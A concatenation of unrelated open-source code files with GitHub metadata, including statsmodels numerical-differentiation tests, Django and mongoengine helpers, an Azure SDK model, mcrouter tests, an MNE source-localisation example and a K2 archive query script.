gradcs = approx_fprime_cs((1,2,3), fun, (x,), h=1.0e-20)
print(gradcs, maxabs(gradcs, gradtrue))
print(approx_hess_cs((1,2,3), fun, (x,), h=1.0e-20)) #this is correctly zero
print(approx_hess_cs((1,2,3), fun2, (y,x), h=1.0e-20)-2*np.dot(x.T, x))
print(numdiff.approx_hess(xk,fun2,1e-3, (y,x))[0] - 2*np.dot(x.T, x))
gt = (-x*2*(y-np.dot(x, [1,2,3]))[:,None])
g = approx_fprime_cs((1,2,3), fun1, (y,x), h=1.0e-20)#.T #this shouldn't be transposed
gd = numdiff.approx_fprime((1,2,3),fun1,epsilon,(y,x))
print(maxabs(g, gt))
print(maxabs(gd, gt))
import statsmodels.api as sm
data = sm.datasets.spector.load()
data.exog = sm.add_constant(data.exog, prepend=False)
#mod = sm.Probit(data.endog, data.exog)
mod = sm.Logit(data.endog, data.exog)
#res = mod.fit(method="newton")
test_params = [1,0.25,1.4,-7]
loglike = mod.loglike
score = mod.score
hess = mod.hessian
#cs doesn't work for Probit because special.ndtr doesn't support complex
#maybe calculating ndtr for real and imag parts separately, if we need it
#and if it still works in this case
print('sm', score(test_params))
print('fd', numdiff.approx_fprime(test_params,loglike,epsilon))
print('cs', numdiff.approx_fprime_cs(test_params,loglike))
print('sm', hess(test_params))
print('fd', numdiff.approx_fprime(test_params,score,epsilon))
print('cs', numdiff.approx_fprime_cs(test_params, score))
#print('fd', numdiff.approx_hess(test_params, loglike, epsilon)) #TODO: bug
'''
Traceback (most recent call last):
File "C:\Josef\eclipsegworkspace\statsmodels-josef-experimental-gsoc\scikits\statsmodels\sandbox\regression\test_numdiff.py", line 74, in <module>
print('fd', numdiff.approx_hess(test_params, loglike, epsilon))
File "C:\Josef\eclipsegworkspace\statsmodels-josef-experimental-gsoc\scikits\statsmodels\sandbox\regression\numdiff.py", line 118, in approx_hess
xh = x + h
TypeError: can only concatenate list (not "float") to list
'''
hesscs = numdiff.approx_hess_cs(test_params, loglike)
print('cs', hesscs)
print(maxabs(hess(test_params), hesscs))
data = sm.datasets.anes96.load()
exog = data.exog
exog = sm.add_constant(exog, prepend=False)
res1 = sm.MNLogit(data.endog, exog).fit(method="newton", disp=0)
datap = sm.datasets.randhie.load()
nobs = len(datap.endog)
exogp = sm.add_constant(datap.exog.view(float).reshape(nobs,-1),
prepend=False)
modp = sm.Poisson(datap.endog, exogp)
resp = modp.fit(method='newton', disp=0)
| {
"content_hash": "037abc737275f6ea9bb25c28c9399cc6",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 152,
"avg_line_length": 38.5792349726776,
"alnum_prop": 0.5681303116147309,
"repo_name": "alekz112/statsmodels",
"id": "50e4c6e4bcf2fb9461115d83301b6ae3d7dcbe86",
"size": "14120",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "statsmodels/tools/tests/test_numdiff.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AGS Script",
"bytes": "457842"
},
{
"name": "Assembly",
"bytes": "10509"
},
{
"name": "Batchfile",
"bytes": "351"
},
{
"name": "C",
"bytes": "12088"
},
{
"name": "HTML",
"bytes": "148470"
},
{
"name": "Python",
"bytes": "7888639"
},
{
"name": "R",
"bytes": "24111"
},
{
"name": "Stata",
"bytes": "26986"
}
],
"symlink_target": ""
} |
"""Container for CSS settings relevant to sphinx themes"""
| {
"content_hash": "9f8201677e5e3e23294f1edce16c6d5b",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 58,
"avg_line_length": 59,
"alnum_prop": 0.7627118644067796,
"repo_name": "chrisjsewell/ipypublish",
"id": "c8a2297297f2a253b5fb691017fb80086c68749b",
"size": "59",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "ipypublish/sphinx/notebook/css/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4549"
},
{
"name": "CSS",
"bytes": "7275"
},
{
"name": "HTML",
"bytes": "7194717"
},
{
"name": "JavaScript",
"bytes": "2124646"
},
{
"name": "Jupyter Notebook",
"bytes": "1319557"
},
{
"name": "Makefile",
"bytes": "4666"
},
{
"name": "Python",
"bytes": "494303"
},
{
"name": "Shell",
"bytes": "552"
},
{
"name": "TeX",
"bytes": "267595"
}
],
"symlink_target": ""
} |
from mongoengine import IntField, StringField, DictField, ReferenceField
from django_town.utils import json
from django.utils.six import string_types
from django.db.models.loading import get_model
class OptionField(IntField):
def __init__(self, option=None, **kwargs):
self.option = option
super(OptionField, self).__init__(**kwargs)
def to_mongo(self, value):
lookup = {v: k for k, v in self.option}
return lookup[value]
def to_python(self, value):
lookup = {k: v for k, v in self.option}
try:
return lookup[value]
except KeyError:
return value
def to_dict(self, value, serializer=None):
return self.to_python(value)
def validate(self, value):
lookup = [v for k, v in self.option]
if value in lookup:
return
self.error('%s is not in [%s]' % value, ', '.join([str(each) for each in lookup]))
class ResourceField(StringField):
def __init__(self, resource, fields=None, **kwargs):
self.resource = resource
self.fields = fields
super(ResourceField, self).__init__(**kwargs)
def to_mongo(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return value._pk
return value
def to_python(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return value
return self.resource(value)
def validate(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return
self.error('%s could not be converted to resource' % value)
class ResourceIntField(IntField):
def __init__(self, resource, fields=None, **kwargs):
self.resource = resource
self.fields = fields
super(ResourceIntField, self).__init__(**kwargs)
def to_mongo(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return int(value._pk)
return int(value)
def to_python(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return value
return self.resource(value)
def validate(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return
# self.error('%s could not be converted to resource' % value)
class ModelField(IntField):
def __init__(self, model, fields=None, **kwargs):
if isinstance(model, string_types):
model = get_model(model)
self.model = model
self.fields = fields
super(ModelField, self).__init__(**kwargs)
def to_mongo(self, value):
if isinstance(value, self.model):
return int(value.pk)
return int(value)
def to_python(self, value):
if isinstance(value, self.model):
return value
return self.model.objects.get(pk=value)
def validate(self, value):
if isinstance(value, self.model):
return
# self.error('%s could not be converted to resource' % value)
class DynamicResourceField(DictField):
def __init__(self, available_resources, fields=None, **kwargs):
self.available_resources = available_resources
self.fields = fields
super(DynamicResourceField, self).__init__(**kwargs)
def to_mongo(self, value):
for resource in self.available_resources:
if hasattr(value, '_manager') and isinstance(value._manager, resource.__class__):
return {'_resource_name': resource._meta.name, '_pk': value._pk}
return value
def __get__(self, instance, owner):
"""Descriptor for retrieving a value from a field in a document.
"""
if instance is None:
# Document class being used rather than a document object
return self
# Get value from document instance if available
return self.to_python(instance._data.get(self.name))
def to_python(self, value):
if isinstance(value, string_types):
try:
value = json.loads(value)
except ValueError:
return None
resource_name = value['_resource_name'] if isinstance(value, dict) and '_resource_name' in value else None
for resource in self.available_resources:
if isinstance(value, resource._meta.resource_instance_cls):
return value
if resource_name and resource_name == resource._meta.name:
_pk = value.get('_pk')
ret = resource(_pk)
# getattr(ret, '_instance')
return ret
return None
def validate(self, value):
for resource in self.available_resources:
if isinstance(value, resource._meta.resource_instance_cls):
getattr(resource._meta.resource_instance_cls, '_instance')
return
if isinstance(value, dict) and value == {}:
return
self.error('%s could not be converted to resource' % value)
class ResourceReferenceField(ReferenceField):
def __init__(self, document_type, fields=None, exclude=None, cache_key_format=None, **kwargs):
from django_town.rest.resources import MongoResource
self.resource = MongoResource(document_type, fields=fields, exclude=exclude, cache_key_format=cache_key_format)
self.fields = fields
super(ResourceReferenceField, self).__init__(document_type, **kwargs)
def to_mongo(self, value):
# print 'to_mongo', value
if isinstance(value, self.resource._meta.resource_instance_cls):
return value._pk
return value
def to_python(self, value):
# print 'to_python', value
if isinstance(value, self.resource._meta.resource_instance_cls):
return value
return self.resource(value)
def validate(self, value):
if isinstance(value, self.resource._meta.resource_instance_cls):
return
self.error('%s could not be converted to resource' % value) | {
"content_hash": "b2e937c66c7b810460d85abca586871e",
"timestamp": "",
"source": "github",
"line_count": 175,
"max_line_length": 119,
"avg_line_length": 35.10285714285714,
"alnum_prop": 0.6141950187204949,
"repo_name": "uptown/django-town",
"id": "9cf0f7f0d9416808a0e5b0eb1f938c239ae00e48",
"size": "6143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_town/mongoengine_extension/fields/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "382389"
}
],
"symlink_target": ""
} |
from django import template
from django.template.loader import render_to_string
from impacts_world.core.models import HeaderSettings
register = template.Library()
@register.simple_tag(takes_context=True)
def header(context, *args, **kwargs):
request = context['request']
settings = HeaderSettings.for_site(request.site)
page = context.get('page')
links = []
for link in settings.header_links.all():
name = link.name
target = link.target.specific
if page and target == page:
active = True
else:
active = False
if target.url:
links.append({'url': target.url, 'text': name, 'active': active})
if settings.show_participate:
name = settings.participate_name
target = settings.participate_target.specific
if page and target == page:
active = True
else:
active = False
if target.url:
context['participate'] = {'url': target.url, 'text': name, 'active': active}
if kwargs.get('show_banner', False):
rendition = settings.banner_image.get_rendition('fill-1200x520-c100')
context['banner'] = {
'first_intro': settings.banner_first_intro,
'second_intro': settings.banner_second_intro,
'image': rendition.url,
}
context['links'] = links
context.update(kwargs)
template = 'widgets/header.html'
return render_to_string(template, context=context.flatten())
| {
"content_hash": "27f3a0e88d6d86b7e3f09584e4d94a45",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 88,
"avg_line_length": 32.69565217391305,
"alnum_prop": 0.620345744680851,
"repo_name": "bruecksen/impacts-world",
"id": "c5e0519aedb3709dd00beb2de801b7a1a395492d",
"size": "1504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "impacts_world/core/templatetags/header.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "32416"
},
{
"name": "HTML",
"bytes": "32355"
},
{
"name": "JavaScript",
"bytes": "4323"
},
{
"name": "Python",
"bytes": "508708"
},
{
"name": "Shell",
"bytes": "303"
}
],
"symlink_target": ""
} |
from .resource import Resource
class ExpressRouteCircuit(Resource):
"""ExpressRouteCircuit resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param sku: The SKU.
:type sku: ~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitSku
:param allow_classic_operations: Allow classic operations
:type allow_classic_operations: bool
:param circuit_provisioning_state: The CircuitProvisioningState state of
the resource.
:type circuit_provisioning_state: str
:param service_provider_provisioning_state: The
ServiceProviderProvisioningState state of the resource. Possible values
are 'NotProvisioned', 'Provisioning', 'Provisioned', and 'Deprovisioning'.
Possible values include: 'NotProvisioned', 'Provisioning', 'Provisioned',
'Deprovisioning'
:type service_provider_provisioning_state: str or
~azure.mgmt.network.v2017_11_01.models.ServiceProviderProvisioningState
:param authorizations: The list of authorizations.
:type authorizations:
list[~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitAuthorization]
:param peerings: The list of peerings.
:type peerings:
list[~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitPeering]
:param service_key: The ServiceKey.
:type service_key: str
:param service_provider_notes: The ServiceProviderNotes.
:type service_provider_notes: str
:param service_provider_properties: The ServiceProviderProperties.
:type service_provider_properties:
~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitServiceProviderProperties
:param provisioning_state: Gets the provisioning state of the public IP
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param gateway_manager_etag: The GatewayManager Etag.
:type gateway_manager_etag: str
:ivar etag: Gets a unique read-only string that changes whenever the
resource is updated.
:vartype etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'ExpressRouteCircuitSku'},
'allow_classic_operations': {'key': 'properties.allowClassicOperations', 'type': 'bool'},
'circuit_provisioning_state': {'key': 'properties.circuitProvisioningState', 'type': 'str'},
'service_provider_provisioning_state': {'key': 'properties.serviceProviderProvisioningState', 'type': 'str'},
'authorizations': {'key': 'properties.authorizations', 'type': '[ExpressRouteCircuitAuthorization]'},
'peerings': {'key': 'properties.peerings', 'type': '[ExpressRouteCircuitPeering]'},
'service_key': {'key': 'properties.serviceKey', 'type': 'str'},
'service_provider_notes': {'key': 'properties.serviceProviderNotes', 'type': 'str'},
'service_provider_properties': {'key': 'properties.serviceProviderProperties', 'type': 'ExpressRouteCircuitServiceProviderProperties'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'gateway_manager_etag': {'key': 'properties.gatewayManagerEtag', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ExpressRouteCircuit, self).__init__(**kwargs)
self.sku = kwargs.get('sku', None)
self.allow_classic_operations = kwargs.get('allow_classic_operations', None)
self.circuit_provisioning_state = kwargs.get('circuit_provisioning_state', None)
self.service_provider_provisioning_state = kwargs.get('service_provider_provisioning_state', None)
self.authorizations = kwargs.get('authorizations', None)
self.peerings = kwargs.get('peerings', None)
self.service_key = kwargs.get('service_key', None)
self.service_provider_notes = kwargs.get('service_provider_notes', None)
self.service_provider_properties = kwargs.get('service_provider_properties', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.gateway_manager_etag = kwargs.get('gateway_manager_etag', None)
self.etag = None
| {
"content_hash": "a26f0321ce04f170bb99652211d25ff9",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 143,
"avg_line_length": 50.177083333333336,
"alnum_prop": 0.6765621756279843,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "e06b244936a1c97d92a74635442c15cda9aaf8cb",
"size": "5291",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2017_11_01/models/express_route_circuit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
import json
import uuid
from datetime import datetime
from importlib import import_module
from urllib.parse import urlparse
from django.core.urlresolvers import resolve, Resolver404
from http.client import responses as REASON_PHRASES
from django_rt.settings import settings
class JsonDateTimeEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return obj.isoformat()
else:
return json.JSONEncoder.default(self, obj)
class SerializableObject:
def serialize(self):
raise NotImplementedError('serialize() not implemented')
@classmethod
def deserialize(cls, data):
raise NotImplementedError('deserialize() not implemented')
def to_json(self):
return json.dumps(self.serialize(), cls=JsonDateTimeEncoder)
@classmethod
def from_json(cls, json_data):
return cls.deserialize(json.loads(json_data))
def get_cors_headers(origin):
"""Return dict containing the appropriate CORS headers for a courier response, given the request origin."""
def get_allow_origin_header(origin):
"""Return the value for the Access-Control-Allow-Origin header, given the request origin."""
RT_CORS_ALLOW_ORIGIN = settings.RT_CORS_ALLOW_ORIGIN
if not RT_CORS_ALLOW_ORIGIN:
# Allow any host when DEBUG is enabled
return '*' if settings.DEBUG else None
elif RT_CORS_ALLOW_ORIGIN == '*':
return '*'
else:
if type(RT_CORS_ALLOW_ORIGIN) is str:
allowed = (RT_CORS_ALLOW_ORIGIN,)
else:
allowed = RT_CORS_ALLOW_ORIGIN
if origin and origin in allowed:
return origin
return None
# Build headers
hdrs = {}
allow_origin = get_allow_origin_header(origin)
if allow_origin:
hdrs['Access-Control-Allow-Origin'] = allow_origin
if settings.RT_CORS_ALLOW_CREDENTIALS is not None:
hdrs['Access-Control-Allow-Credentials'] = \
'true' if settings.RT_CORS_ALLOW_CREDENTIALS else 'false'
return hdrs
def get_full_channel_name(channel):
return ':'.join((settings.RT_PREFIX, 'channel', channel))
def get_http_status_reason(status):
if status in REASON_PHRASES:
return REASON_PHRASES[status]
else:
return ''
def verify_resource_view(route):
"""Resolve the specified route with Django and verify that the view class is actually a Django-RT resource.
Will throw either a ResourceError or NotAnRtResource exception on failure."""
from django_rt.resource import ResourceError, NotAnRtResourceError
# Resolve
try:
r = resolve(route)
except Resolver404:
# Route not found
raise ResourceError(404)
# Import class from its module
module = import_module(r.func.__module__)
view_class = getattr(module, r.func.__name__)
# Check '_rt_is_resource' class property is True
try:
if not getattr(view_class, '_rt_is_resource'):
raise NotAnRtResourceError()
except AttributeError:
raise NotAnRtResourceError()
def generate_subscription_id():
return uuid.uuid4().hex
def get_subscription_key(id):
return ':'.join((settings.RT_PREFIX, 'subscription', id))
def get_django_url(url):
"""Attempt to parse the Django server URL. If url is None, use the URL from the RT_DJANGO_URL setting instead.
Returns parsed URL.
"""
# Use setting if url is not given
if not url:
url = settings.RT_DJANGO_URL
# URL should not have a path component, but allow a single trailing slash anyway
if url.endswith('/'):
url = url[:-1]
# Parse
p = urlparse(url)
# URL should not have anything after the path
if p.params or p.query or p.fragment:
raise ValueError('Invalid Django server URL')
if p.scheme == 'http':
# HTTP URL should not have a path
if p.path:
raise ValueError('Invalid Django server URL')
elif p.scheme == 'http+unix':
# HTTP URL should not have a netloc fragment
if p.netloc:
raise ValueError('Invalid Django server URL')
else:
# Unsupported scheme
raise ValueError('Unsupported Django server URL scheme "%s"' % (p.scheme,))
return p
| {
"content_hash": "114e648023cc585bb2bb99852666576b",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 114,
"avg_line_length": 31.27338129496403,
"alnum_prop": 0.6507936507936508,
"repo_name": "jhannington/django-rt",
"id": "f11191f2cd5d18f85e7f9ada988c3b59a58ce7c1",
"size": "4347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_rt/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "37879"
}
],
"symlink_target": ""
} |
from sys import argv, exit
import re
from parse import parse
if len(argv) != 3:
print('usage: {} <reference.xml> <out-xml-file>'.format(argv[0]))
exit(1)
plugin = parse(argv[1])
with open(argv[2], 'w') as fxml:
for cmd in plugin.commands:
if plugin.short_name:
func = 'sim{}.{}'.format(plugin.short_name, cmd.name)
else:
func = '{}{}'.format(plugin.command_prefix, cmd.name)
fxml.write('<KeyWord name="{}" func="yes">\n'.format(func))
fxml.write('<Overload retVal="{}">\n'.format(','.join(cmd.help_out_args_v)))
for p in cmd.help_in_args_v:
fxml.write('<Param name="{}" />\n'.format(p))
fxml.write('</Overload>\n')
fxml.write('</KeyWord>\n')
fxml.write('\n')
for enum in plugin.enums:
for item in enum.items:
if plugin.short_name:
prefix = 'sim{}.{}.'.format(plugin.short_name, enum.name)
else:
prefix = enum.item_prefix
fxml.write('<KeyWord name="{}{}" func="no"/>\n'.format(prefix, item))
fxml.write('\n')
| {
"content_hash": "d96238e74fc82c46b781860acaf74c1c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 84,
"avg_line_length": 33.72727272727273,
"alnum_prop": 0.5435759209344115,
"repo_name": "EricssonResearch/scott-eu",
"id": "097fdb476d30aa0a615e4267ab5a2716f4150e18",
"size": "1113",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simulation-ros/src/vrep_ros_interface/external/v_repStubsGen/generate_notepadplusplus_xml.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "557472"
},
{
"name": "C#",
"bytes": "53898"
},
{
"name": "C++",
"bytes": "209194"
},
{
"name": "CMake",
"bytes": "68861"
},
{
"name": "CSS",
"bytes": "7068"
},
{
"name": "Cuda",
"bytes": "13073"
},
{
"name": "Dockerfile",
"bytes": "13106"
},
{
"name": "Groovy",
"bytes": "5714"
},
{
"name": "HTML",
"bytes": "48278"
},
{
"name": "Java",
"bytes": "1097268"
},
{
"name": "JavaScript",
"bytes": "134624"
},
{
"name": "Kotlin",
"bytes": "120642"
},
{
"name": "Lua",
"bytes": "257969"
},
{
"name": "MATLAB",
"bytes": "910"
},
{
"name": "Makefile",
"bytes": "32165"
},
{
"name": "Objective-C",
"bytes": "3527"
},
{
"name": "Prolog",
"bytes": "33238"
},
{
"name": "Python",
"bytes": "1758831"
},
{
"name": "Scala",
"bytes": "2494"
},
{
"name": "Shell",
"bytes": "9731"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.MCProcess import *
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLogicalRoutingPolicies(McrouterTestCase):
config = './mcrouter/test/test_logical_routing_policies.json'
extra_args = []
def setUp(self):
self.mc = self.add_server(Memcached())
def test_different_cluster(self):
mcrouter = self.add_mcrouter(self.config, '/region1/cluster2/',
extra_args=self.extra_args)
key = 'foo1'
value = 'value1'
mcrouter.set(key, value)
self.assertEqual(self.mc.get(key), value)
def test_different_region_cluster(self):
mcrouter = self.add_mcrouter(self.config, '/region2/cluster3/',
extra_args=self.extra_args)
key = 'foo2'
value = 'value2'
mcrouter.set(key, value)
self.assertEqual(self.mc.get(key), value)
| {
"content_hash": "b520c6ac8d814664b872ac557d2a3d54",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 71,
"avg_line_length": 35.766666666666666,
"alnum_prop": 0.6346691519105312,
"repo_name": "247687009/mcrouter",
"id": "4a38becde1c1e2f179df899b3b44476cc1009f14",
"size": "1362",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "mcrouter/test/test_logical_routing_policies.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
urlquery module
"""
import cache
import database
def compose_response(is_malware=False):
response = { "malware" : str(is_malware) }
return response
def exists_in_cache(url, cache_hostname):
return cache.exists(url, cache_hostname)
def exists_in_database(url, db_hostname, table_name, conf):
is_malware = database.query_url(url, db_hostname, table_name, conf)
if is_malware:
return True
else:
return False
def write_to_cache(url, hostname, conf):
return cache.write(url, hostname, conf)
def delete_from_cache(url, hostname):
return cache.delete(url, hostname)
def process_url(url, hostname, table_name, conf):
if exists_in_cache(url, hostname):
return compose_response(is_malware=True)
else:
is_malware = exists_in_database(url, hostname, table_name, conf)
if is_malware:
write_to_cache(url, hostname, conf)
return compose_response(is_malware)
else:
return compose_response(is_malware)
| {
"content_hash": "062a4fb4af794b4f0fc390f865b8d22a",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 72,
"avg_line_length": 26.333333333333332,
"alnum_prop": 0.6611489776046738,
"repo_name": "vitovitolo/yama",
"id": "e82e4fc6291f943d0c427139e4ff13fae8314521",
"size": "1027",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "yama/urlquery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Pascal",
"bytes": "21"
},
{
"name": "Puppet",
"bytes": "21621"
},
{
"name": "Python",
"bytes": "14147"
},
{
"name": "Ruby",
"bytes": "956"
},
{
"name": "Shell",
"bytes": "1882"
}
],
"symlink_target": ""
} |
"""
================================================================
Compute sparse inverse solution with mixed norm: MxNE and irMxNE
================================================================
Runs an (ir)MxNE (L1/L2 [1]_ or L0.5/L2 [2]_ mixed norm) inverse solver.
L0.5/L2 is done with irMxNE which allows for sparser
source estimates with less amplitude bias due to the non-convexity
of the L0.5/L2 mixed norm penalty.
References
----------
.. [1] Gramfort A., Kowalski M. and Hamalainen, M.
"Mixed-norm estimates for the M/EEG inverse problem using accelerated
gradient methods", Physics in Medicine and Biology, 2012.
https://doi.org/10.1088/0031-9155/57/7/1937.
.. [2] Strohmeier D., Haueisen J., and Gramfort A.
"Improved MEG/EEG source localization with reweighted mixed-norms",
4th International Workshop on Pattern Recognition in Neuroimaging,
Tuebingen, 2014. 10.1109/PRNI.2014.6858545
"""
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Daniel Strohmeier <daniel.strohmeier@tu-ilmenau.de>
#
# License: BSD (3-clause)
import numpy as np
import mne
from mne.datasets import sample
from mne.inverse_sparse import mixed_norm, make_stc_from_dipoles
from mne.minimum_norm import make_inverse_operator, apply_inverse
from mne.viz import (plot_sparse_source_estimates,
plot_dipole_locations, plot_dipole_amplitudes)
print(__doc__)
data_path = sample.data_path()
fwd_fname = data_path + '/MEG/sample/sample_audvis-meg-eeg-oct-6-fwd.fif'
ave_fname = data_path + '/MEG/sample/sample_audvis-ave.fif'
cov_fname = data_path + '/MEG/sample/sample_audvis-shrunk-cov.fif'
subjects_dir = data_path + '/subjects'
# Read noise covariance matrix
cov = mne.read_cov(cov_fname)
# Handling average file
condition = 'Left Auditory'
evoked = mne.read_evokeds(ave_fname, condition=condition, baseline=(None, 0))
evoked.crop(tmin=0, tmax=0.3)
# Handling forward solution
forward = mne.read_forward_solution(fwd_fname)
###############################################################################
# Run solver
alpha = 55 # regularization parameter between 0 and 100 (100 is high)
loose, depth = 0.2, 0.9 # loose orientation & depth weighting
n_mxne_iter = 10 # if > 1 use L0.5/L2 reweighted mixed norm solver
# if n_mxne_iter > 1 dSPM weighting can be avoided.
# Compute dSPM solution to be used as weights in MxNE
inverse_operator = make_inverse_operator(evoked.info, forward, cov,
depth=depth, fixed=True,
use_cps=True)
stc_dspm = apply_inverse(evoked, inverse_operator, lambda2=1. / 9.,
method='dSPM')
# Compute (ir)MxNE inverse solution with dipole output
dipoles, residual = mixed_norm(
evoked, forward, cov, alpha, loose=loose, depth=depth, maxit=3000,
tol=1e-4, active_set_size=10, debias=True, weights=stc_dspm,
weights_min=8., n_mxne_iter=n_mxne_iter, return_residual=True,
return_as_dipoles=True)
###############################################################################
# Plot dipole activations
plot_dipole_amplitudes(dipoles)
# Plot dipole location of the strongest dipole with MRI slices
idx = np.argmax([np.max(np.abs(dip.amplitude)) for dip in dipoles])
plot_dipole_locations(dipoles[idx], forward['mri_head_t'], 'sample',
subjects_dir=subjects_dir, mode='orthoview',
idx='amplitude')
# # Plot dipole locations of all dipoles with MRI slices
# for dip in dipoles:
# plot_dipole_locations(dip, forward['mri_head_t'], 'sample',
# subjects_dir=subjects_dir, mode='orthoview',
# idx='amplitude')
###############################################################################
# Plot residual
ylim = dict(eeg=[-10, 10], grad=[-400, 400], mag=[-600, 600])
evoked.pick_types(meg=True, eeg=True, exclude='bads')
evoked.plot(ylim=ylim, proj=True, time_unit='s')
residual.pick_types(meg=True, eeg=True, exclude='bads')
residual.plot(ylim=ylim, proj=True, time_unit='s')
###############################################################################
# Generate stc from dipoles
stc = make_stc_from_dipoles(dipoles, forward['src'])
###############################################################################
# View in 2D and 3D ("glass" brain like 3D plot)
solver = "MxNE" if n_mxne_iter == 1 else "irMxNE"
plot_sparse_source_estimates(forward['src'], stc, bgcolor=(1, 1, 1),
fig_name="%s (cond %s)" % (solver, condition),
opacity=0.1)
###############################################################################
# Morph onto fsaverage brain and view
stc_fsaverage = stc.morph(subject_from='sample', subject_to='fsaverage',
grade=None, sparse=True, subjects_dir=subjects_dir)
src_fsaverage_fname = subjects_dir + '/fsaverage/bem/fsaverage-ico-5-src.fif'
src_fsaverage = mne.read_source_spaces(src_fsaverage_fname)
plot_sparse_source_estimates(src_fsaverage, stc_fsaverage, bgcolor=(1, 1, 1),
fig_name="Morphed %s (cond %s)" % (solver,
condition), opacity=0.1)
| {
"content_hash": "92e66d4f491bc64b28b8110b1bb9c47d",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 79,
"avg_line_length": 43.924369747899156,
"alnum_prop": 0.5953701932274728,
"repo_name": "teonlamont/mne-python",
"id": "0cf660cf0840886a5e7f21e392797114c235398a",
"size": "5227",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "examples/inverse/plot_mixed_norm_inverse.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "3117"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "4354605"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
} |
"""
Created on Fri Jul 31 09:45:08 2015
@author: fmullall
"""
import matplotlib.pyplot as mp
import numpy as np
import queryMast
import nca
class QueryK2ByTgtId(queryMast.QueryMast):
def __init__(self):
"""Query the MAST for K2 data by Investigation ID
All the code that does the work is stored in QueryMast and
AbstractDataQuery. This class just needs to specifiy the
name of the KIC at MAST.
"""
self.cachePrefix = "k2invest"
queryMast.QueryMast.__init__(self)
self.catalogueName = "k2/data_search"
self.cachePrefix = "k2invest"
def constructUrl(self, investigationId):
if self.catalogueName is None:
raise NotImplementedError("Daughter class must set self.catalogueName!")
#Cast as string if necessary
if isinstance(investigationId, int):
investigationId = "%i" %(investigationId)
outputCols = "ktc_k2_id,sci_campaign,ktc_investigation_id,sci_ra,sci_dec,kp"
# build mast query
url = 'http://archive.stsci.edu/'
url += '%s/search.php?' %(self.catalogueName)
url += 'action=Search'
url += "&ktc_investigation_id=*%s*" %(investigationId)
url += '&coordformat=dec'
url += '&outputformat=CSV'
url += '&selectedColumnsCsv=%s' %(outputCols)
url += '&verb=0'
return url
def queryProposal(self, investigationId):
url = self.constructUrl(investigationId)
cacheDir = "cache"
text = self.query(0,0,0, url=url, cacheDir=cacheDir)
return text
def main():
props = []
props.append( (3111, 'WD_Kilic'))
props.append( (3116, 'WD_Redfield'))
props.append( (3096, 'EXO_Heller'))
props.append( (3095, 'EXO_vanGrootel'))
props.append( (3086, 'EB_Southworth'))
props.append( (3067, 'EB_Peters'))
props.append( (3049, 'EB_Prsa'))
